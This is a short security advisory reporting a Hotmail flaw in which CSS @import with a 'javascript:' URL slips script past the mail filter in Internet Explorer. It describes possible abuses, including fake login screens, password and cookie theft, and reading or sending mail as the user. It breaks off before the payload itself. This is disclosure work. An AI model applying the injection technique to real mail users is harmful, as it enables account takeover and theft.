
Details:
Several months ago in my Advisory #3, 2000 I alerted about a Hotmail
bug
with "@import url(javascript:...)".
It was fixed, but now I found a similar bug.
There is a new security flaw in Hotmail which allows injecting and
executing
JavaScript code in an email message using the the  tag, @import
and the "javascript:" protocol.
This exploit works on Internet Explorer.
Hotmail tries to filter JavaScript code for security reasons.
Executing JavaScript when the user opens Hotmail email message allows
for example
displaying a fake login screen where the user enters his password
which
is then stolen.
I don't want to make a scary demonstration, but it is also possible to
read user's
messages, to send messages from user's name and doing other mischief.
It is also possible to get the cookie from Hotmail, which is
dangerous.
Hotmail deliberately escapes all JavaScript (it can escape) to prevent
such attacks, but obviously there are holes.

The following JavaScript is executed if embedded in a HTML message:
- ---